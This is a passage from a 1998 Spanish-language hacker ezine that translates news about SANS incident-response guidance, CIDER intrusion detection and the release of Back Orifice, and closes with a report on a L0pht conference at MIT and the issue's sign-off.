  6838.   Institute of Bethesda, Md., disponible en http://www.sans.org, el libro
  6839.   cuesta $27 y discute como combatir a un intruso, ataques denial of
  6840.   service, cyberladrones y otros temas de seguridad.
  6841.                      
  6842.         El libro cita seis estados de responsabilidad: preparacion, deteccion,
  6843.   contencion, eradicacion, recuperacion y seguimiento. Pero se enfoca mas en
  6844.   la parte de preparacion. Hace hincapie otra vez en proteger la red antes
  6845.   de que sea atacada.
  6846.           
  6847.         El grupo Shadow encontro que un buen lugar para empezar es justificar
  6848.   un gasto para invertir en una infraestuctura de seguridad. Tambien encontro
  6849.   que muchos sitios no tienen una solida politica de seguridad o incluso una
  6850.   filosofia en vez, que relentiza y complica las cosas cuando los incidentes
  6851.   ocurren.
  6852.                                                                              
  6853.         "Cada uno debe escoger la filosofia que ahi que seguir y conseguir
  6854.   presupuesto," dice Northcutt, antes de formular un plan de responsabilidad.
  6855.   Y el grupo aprendio que todos necesitan entrenamiento en el area de
  6856.   seguridad.
  6857.                                     
  6858.         El grupo decidio que lo que funciona con organizaciones grandes no
  6859.   siempre funciona con las pequeñas. Grupos grandes han dedicado personal
  6860.   para contener los incidentes. Las pequeñas generalmente emplean a un solo
  6861.   miembro cuando ahi indicios de penetracion.
  6862.  
  6863.         Un inadecuado administrador de red, por exemplo, puede estar usando
  6864.   una cuenta privilegiada que el administrador nunca haya usado antes. Eso
  6865.   le daria pistas al intruso de que ha sido descubierto, por lo que el
  6866.   intruso podria destruir las evidencias y causar otro tipo de daños.
  6867.  
  6868.         Las discusiones del grupo Shadow revelan los puntos de los ataques
  6869.   Hackers. Los miembros coinciden en las maneras de como combatir contra
  6870.   codigo malicioso (usando antivirus, scanners para paquetes inexplicables
  6871.   enviados automaticamente desde tu red hacia Internet).
  6872.                                                         
  6873.         Ellos tambien coinciden en realizar pruebas y network mapping
  6874.   (probando uno mismo puede aprender muchisimo sobre el funcionamiento de su
  6875.   red). Ellos tambien discuten sobre denial of service (estableciendo una
  6876.   facilidad de backup), organizaciones de espionaje (seguir el trafico,
  6877.   incluso falsificar informacion para despitar al intruso), hoaxes (mantener
  6878.   a los empleados informados, por ejemplo en http://ciac.llnl.gov), y
  6879.   acceso no autorizados (restringir las conexiones IP permitidas).
  6880.  
  6881.         Sorprendentemente, Northcutt dijo que el no esta muy concenciado de
  6882.   ataques con script∩s en algunos sitios.
  6883.  
  6884.         "La busqueda de informacion es la mejor forma de concerciarme" dice
  6885.   el. "En varios casos, hemos notado varios intentos de ataques, que indicaban
  6886.   que el intruso conocia la estructura de nuestro sistema."
  6887.  
  6888.         Los departamentos del DOD acuden rapidamente a sus equipos de
  6889.   respuesta ante incidentes informaticos para recibir ayuda inmediata. Un
  6890.   ejemplo de esto, esta en http://www.assist.mil
  6891.  
  6892.         El segundo resultado que concluyo el grupo Shadow se llama
  6893.   Cooperative Intrusion Detection Evaluation and Response project o tambien
  6894.   conocido como CIDER. Tambien un projecto del Instituto Sans, con la
  6895.   cooperacion de la Marina, con el fin de ayudar a las organizaciones a
  6896.   construir defensas propias.
  6897.  
  6898.         El CIDER se concentra en dos tecnicas. La primera es el TCPdump, un
  6899.   programa que monotoriza y filtra la actividad TCP a base de unas reglas
  6900.   cuando aparece un problema. La segunda es Network Flight Recorder, un
  6901.   conjunto de herramientas todavia en desarrollo para monotorizar, archivar y
  6902.   alertar a las autoridades.
  6903.                                                                   
  6904.         Los detalles del CIDER estan disponibles en
  6905.   http://www.nswc.navy.mil/ISSEC/CID/ . Cuando lo visitas, se puede bajar
  6906.   una copia shareware. Pero a causa de la cantidad de log's que genera, es
  6907.   recomendable añadir mas cantidad de disco duro para que funcione
  6908.   correctamente. La herramienta viene con una buena documentacion.
  6909.  
  6910.         Finalmente, lleva en mente que no en todos los casos de recuperacion
  6911.   resultan ataques de hackers. Casos externos tambien incluyen desastres
  6912.   naturales, descuidos y fallos en los equipos. Teniendo un plan de
  6913.   responsabilidad y un plan de recuperacion es el primer paso para controlar
  6914.   la perdida de servicio.
  6915.  
  6916.         Para una lista de herramientas de seguridad, visitar
  6917.   http://www.perl.com/latro
  6918.  
  6919.         Para monotorizar un grupo de UseNet que discute sobre temas de
  6920.   seguridad, comprobar las comp.sys.www.security o comp.infosystems.www.cgi
  6921.  
  6922.         Ver The Best of Security en best-of-security@requestcyber.com.au o
  6923.   en los diferentes equipos del CERT, cert-advisory-request@cert.org
  6924.  
  6925.         Shawn P. McCarthy es un periodista informatico, webmaster y
  6926.   programador de Internet para Cahners Business Information Inc.
  6927.  
  6928.   Reported by Government Computer News: http://www.gcn.com 
  6929.  
  6930. <────────────────────────────────────────────────────────────────────────────>
  6931.   LA LUCHA POR LA HABILIDAD AUMENTA.
  6932.  
  6933.   12Aug98 USA: RANDOM NEWSBYTES - 
  6934.  
  6935.   By Tony Waltham
  6936.  
  6937.         La semana pasada los hackers se reunieron en las vegas en una
  6938.   conferencia conocida como Defcon VI, pero por lo general el evento no tiene
  6939.   mucha publicidad excepto en esta ocasion que a sido de principal noticia en
  6940.   CNN, ZDNet y la revista Wired cuando un grupo de hackers que se
  6941.   autodenominan "the Cult of the Dead Cow" anuncio una nueva potente
  6942.   herramienta que permite el acceso remoto a maquinas Windows 95 o 98.
  6943.  
  6944.         Esta utilidad autocontenida y que se instala por si misma permite
  6945.   a sus usuarios controlar y monotorizar ordenadores que corren el sistema
  6946.   operativo Windows en una red. Y este software puede ser obtenido de forma
  6947.   gratuita en Internet.
  6948.  
  6949.         Conocida como Back Orifice, ironicamente parecido al BackOffice de
  6950.   Microsoft, principalmente provee unas potentes capacidades para el hacking
  6951.   que pueden ser usadas contra cualquier ordenador con la plataforma Windows.
  6952.  
  6953.         Microsoft respondio de inmediato restando importancia en las
  6954.    capacidades de Back Orifice, mientras que un experto en seguridad de
  6955.    Microsoft dijo que el programa no representa un gran problema a los
  6956.    usuarios finales de Windows. Back Orifice es solo otra herramienta que un
  6957.    administrador puede instalar en una red para monotorizar esta... para
  6958.    examinar el sistema, explico.
  6959.  
  6960.         Por otro lado, la revista Wired indica que esta postura es demasiado
  6961.   blanda, y publico un analisis de un consultor independiente de seguridad
  6962.   llamado Weld Pond, del grupo L0Pht Heavy Industries con sede en Boston (la
  6963.   cual es una organizacion hacker) que contradice la opinion de Microsoft.
  6964.  
  6965.         Diciendo: "Se puede controlar el sistema de ficheros y tambien el
  6966.   registro - es realmente sencillo... (usa) un interface de web...
  6967.   Se puede subir cualquier fichero en el sistema o bajar cualquier fichero
  6968.   desde cualquier sitio en Internet."
  6969.  
  6970.         Lo que esta herramienta pone de manifiesto es el alto riesgo que
  6971.   demuestran ser las redes de ordenadores y sus estandar para los hackers.
  6972.   Desafortunadamente, al ser una herramienta tal facil provocara un
  6973.   crecimiento en entradas ajenas a los ordenadores, en vez de estimular una
  6974.   mayor vigilancia en los usuarios, provocando una mayor vulnerabilidad en las
  6975.   redes informaticas.
  6976.  
  6977.         La Defcon VI atrajo a unos 1.000 hackers (ademas de would-b hackers),
  6978.   pero su numero aumenta por el mundo entero.
  6979.  
  6980.         Consultores expertos en seguridad han dicho que ahora existen unos
  6981.   50.000 hackers, mientras que algunos estiman mas incluso, especialmente si
  6982.   se consideran los wannabees.
  6983.  
  6984.         Otro experto, Charles Palmer, el cabezilla del grupo de IBM "ethical
  6985.   hackers" miro el problema de forma diferente, y reconocio que existen unos
  6986.   100 hackers realmente peligrosos por el mundo hoy en dia.
  6987.  
  6988.         Una de las actividades de este grupo es extraer pruebas de los
  6989.   sistemas que han sido invadidos, buscar evidencias forenses como por ejemplo
  6990.   fragmentos de codigo en las herramientas usadas, pero dejadas escondidas en
  6991.   el sistema.
  6992.  
  6993.         Hoy, el anonimato de la World Wide Web y la publicidad que los ataques
  6994.   generan - especialmente aquellos sistemas importantes en Internet que han
  6995.   sido hackeados - estimulan esta labor.
  6996.  
  6997.         ¿ Realmente es tan grave el problema del hacking ?
  6998.  
  6999.         Considerando esta estadistica : En un periodo de 12 meses se han
  7000.   registrado unos 250.000 intentos de entrada en los ordenadores de US Air
  7001.   Force, segun las noticias de ZDNet. Despues fueron robados en 1996 de una
  7002.   surcusal del Citibank unos 10 millones de dolares. Esto indica el serio
  7003.   peligro de los intrusos informaticos. Ninguna red puede considerarse inmune
  7004.   contra los intrusos, fuera de la compañia o dentro de ella, y aumentar la
  7005.   seguridad debe ser una de las principales tareas de una empresa. Al igual
  7006.   que el dinero es guardado en sitio seguro, los datos tambien lo deberian
  7007.   estar.
  7008.  
  7009.         E incluso los cerrojos y las llaves (palabras de paso) tiene que ser
  7010.   cambiados frecuentemente, mientras aquellos encargados de uan red de
  7011.   ordenadores tienen que estar alerta de los avisos de seguridad que van
  7012.   apareciendo que conciernen a los diferentes sistemas operativos o las
  7013.   aplicaciones asi como las nuevas fallos que se van descubriendo y publicados
  7014.   casi diariamente.
  7015.  
  7016.         Los expertos en seguridad constantemente avisan que nunca es
  7017.   suficiente concenciarse sobre la importancia de la seguridad y sobre los
  7018.   aparentes sistemas informaticos detras de un cortafuegos, etc. pueden ser
  7019.   facilmente comprometidos por un experto hacker o un espia industrial.
  7020.  
  7021.         Recientemente tuve una charla con un experto en seguridad de la
  7022.   empresa Sun Microsystems quien me explico que en Sun existe una regla
  7023.   fundamental: Si alquien pone un modem en la red de la corporacion sera
  7024.   gravemente penalizado.
  7025.  
  7026.         (Esto puede ser un punto vulnerable de una red. Un empleado quien
  7027.   necesita llamar a Internet a lo mejor conecta un modem en la red de su
  7028.   desktop - y no cuenta nada al encargado porque existe una estricta politica
  7029.   en este aspecto y ademas estan demasiados ocupados para ayudar.)
  7030.  
  7031.         Los Hackers generalmente no actuan con intenciones criminales, pero
  7032.   en algunos casos como el de Citibank ilustra que una cosa puede llevar a la
  7033.   otra.
  7034.  
  7035.         Aqui, la experencia de conseguir acceso y controlar sistemas
  7036.   informaticos de bancos fue desarrollado por un grupo de Hackers rusos que
  7037.   estaban interesados en obtener ventajas economicas. La etica Hacker para 
  7038.   estos intrusos fue como exploracion y no para robar.
  7039.  
  7040.         Por otro lado, drogado y depresivo, uno de los Hackers vendio los
  7041.   secretos por $100 y 2 botellas de vodka, permitiendo que las organizaciones
  7042.   criminales pudiesen robar 10 millones de dolares.
  7043.  
  7044.         El tema de hacking nunca desaparecera, y por el momento casi nunca es
  7045.   inocente - pero si destructivo - muchos de ellos se interesan en poder
  7046.   saltarse las barreras de los sistemas informaticos, en algunos casos puede
  7047.   costar caro cuando los datos han sido accidentalmente borrados o
  7048.   comprometidos.
  7049.  
  7050.         Es el juego del gato y el raton, reflejando un lado perveso en la
  7051.   naturaleza del hombre (como los virus informaticos, que son destructivos
  7052.   o benignos.)
  7053.  
  7054.         Pero es una larga carrera, como el coste del fraude con tarjetas
  7055.   de credito, cualquiera puede ser el que tenga que pagar a un experto en
  7056.   seguridad para examinar el daño que su sistema a sufrido por la actividad
  7057.   hacking.
  7058.  
  7059.         Por supuesto prevenirse es la mejor cura. Es mejor minimizar el coste
  7060.   de una actividad hacking manteniendo a un experto en seguridad o un
  7061.   consultor y poder mantener un buen nivel de productividad.
  7062.             
  7063.         Es tambien critico mantener al dia los riesgos, los peligros y las
  7064.   apropiadas acciones a seguir en caso de riesgo en esta lucha por la
  7065.   habilidad.
  7066.  
  7067.   Tony Waltham es el editor de Database.
  7068.  
  7069.   BANGKOK POST 12/08/98 P7 
  7070.  
  7071. <────────────────────────────────────────────────────────────────────────────>
  7072.   EL NT EN EL PUNTO DE MIRA DE LOS HACKERS.
  7073.  
  7074.   13Aug98 USA.
  7075.  
  7076.         Los Hackers que han distribuido un programa para controlar
  7077.   remotamente el Windows 95 y 98 han avisado que pueden sacar una version
  7078.   para el Windows NT, escribe Steve Ranger.
  7079.                                                                 
  7080.         El grupo americano the Cult of the Dead Cow (cDc) la semana pasada
  7081.   distribuyo el Back Orifice, una herramienta que permite tomar el control
  7082.   desde un PC a otro PC sin el conocimiento del usuario.
  7083.  
  7084.         El cDc dice que el Back Orifice a sido bajado del web durante los
  7085.   cuatro primeros dias desde que fue puesta unas 35.000 veces.
  7086.  
  7087.         Una version que permite a los Hackers controlar una maquina basada en
  7088.   Windows desde Unix a sido distribuida, y el cDc dice que esta trabajando en
  7089.   una version que permita controlar remotamente el NT.
  7090.  
  7091.         Microsoft alega que los usuarios que usen procedimientos de seguridad,
  7092.   como servidores proxy, cortafuegos y no bajan ningun tipo de codigo desde
  7093.   sitios desconocidos deberian estar a salvo de esta herramienta.
  7094.  
  7095.         El cDc desmienta esto. 'Existen varias maneras de que el programa
  7096.   corra en un ordenador Windows, no solo sin la aprobacion del usuario, pero
  7097.   si sin el conocimiento del usuario,' dice el portavoz del cDc.
  7098.  
  7099.         Paul Ducklin, cabezilla del grupo de anti-virus Sophos, dice que el
  7100.   Back Orifice 'es un programa que hace lo que dice - control remoto en un
  7101.   Windows 95'.
  7102.  
  7103.         El Back Orifice da la oportunidada a los Hackers de controlar casi
  7104.   todas las partes del sistema incluyendo el registro, el sistema de ficheros
  7105.   y la teclas pulsadas. La herramienta de administracion remota tambien puede
  7106.   ser usada legitimamente para soporte tecnico remoto o administracion remota
  7107.   de una red.
  7108.  
  7109.   COMPUTING 13/08/98 P2 
  7110.                                                
  7111. <────────────────────────────────────────────────────────────────────────────>
  7112.    - J.J.F. / HACKERS TEAM - ESTUVO CON L0PHT EN MIT.
  7113.  
  7114.         El dia 16/9 - J.J.F. / HACKERS TEAM - asistio a una conferencia
  7115.   referente al mundo de los Hackers. Esta conferencia fue patronicada por la
  7116.   AIP (Association of Internet Professionals, Boston, Massachusetts Chapter.),
  7117.   en la cual se invito a varios conferenciantes, la jefa encargada de los
  7118.   delitos informaticos de FBI de Massachusetts, 2 agentes de esta division,
  7119.   un experto en seguridad y a el Dr. Mudge del grupo L0pth, conocido grupo
  7120.   de hackers residentes en Boston.
  7121.  
  7122.         La conferencia fue muy divertida, ya que los de L0pth no siente
  7123.   demasiado afecto al FBI por lo que se pudo oir, ya que durante la
  7124.   conferencia Mudge aprovecho para burlarse de los agentes del FBI, ademas
  7125.   quedaron realmente mal cuando los propios agente del FBI no eran capazes de
  7126.   responder a varias preguntas de Mudge y de los propios oyentes, unicamente
  7127.   contestaban con evasivas :)
  7128.         
  7129.         Como anecdota decir que los de L0pth ivan con sus camisetas oficiales
  7130.   y nosotros, ivamos con las nuestras tambien pero ademas con la gorras
  7131.   tambien, provocando que cuando entramos en la sala todo la gente se quedo
  7132.   boquiabiertos y los de L0pth se comenzaron al reir cuando vieron otro
  7133.   grupo Hacker entra en la sala.
  7134.  
  7135.         Desde aqui mandamos un saludo a la gente de L0pth, por ser tan
  7136.   agradables con nosotros y en especial a Dr. Mudge. Para mas informacion
  7137.   sobre la conferencia os remito a los siguientes url's:
  7138.  
  7139.   http://www.l0pht.com/index.html
  7140.   http://boston.us.association.org/
  7141.  
  7142. <────────────────────────────────────────────────────────────────────────────>
  7143. ██████████████████████████████████████████████████████████████████████████████
  7144. <────────────────────────────────────────────────────────────────────────────>
  7145.  
  7146.         Pues aqui acaba este magnifico numero o eso pensamos, pero por
  7147.   supuesto que el proximo intentaremos que sea mejor :) pero logicamente
  7148.   necesitamos vuestra colaboracion.
  7149.  
  7150.         Como ya hemos dicho varias veces en este ezine puede escribir quien
  7151.   quiera, da igual si eres policia, administrador, etc. para eso estamos
  7152.   nosotros para expandir vuestras opiniones. Aqui publicamos H/C/P/V,
  7153.   seguridad, cursillos, de todo un poco :)
  7154.  
  7155.         A ver si para el siguiente numero os damos varias sorpresas que
  7156.   seguro que seran noticia por todos lados, ya que - J.J.F. / HACKERS TEAM -
  7157.   se lanza a la carga. Bueno, se acabo lo que se daba y una feliz vuelta a
  7158.   clase a todos nuestros lectores. Pues eso, escribe a: 
  7159.  
  7160.   jjf_team@usa.net      
  7161.  
  7162.                          ADIOS Y HASTA EL SIGUIENTE NUMERO!!!
  7163.                                - J.J.F. / HACKERS TEAM -
  7164.  
  7165. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  7166.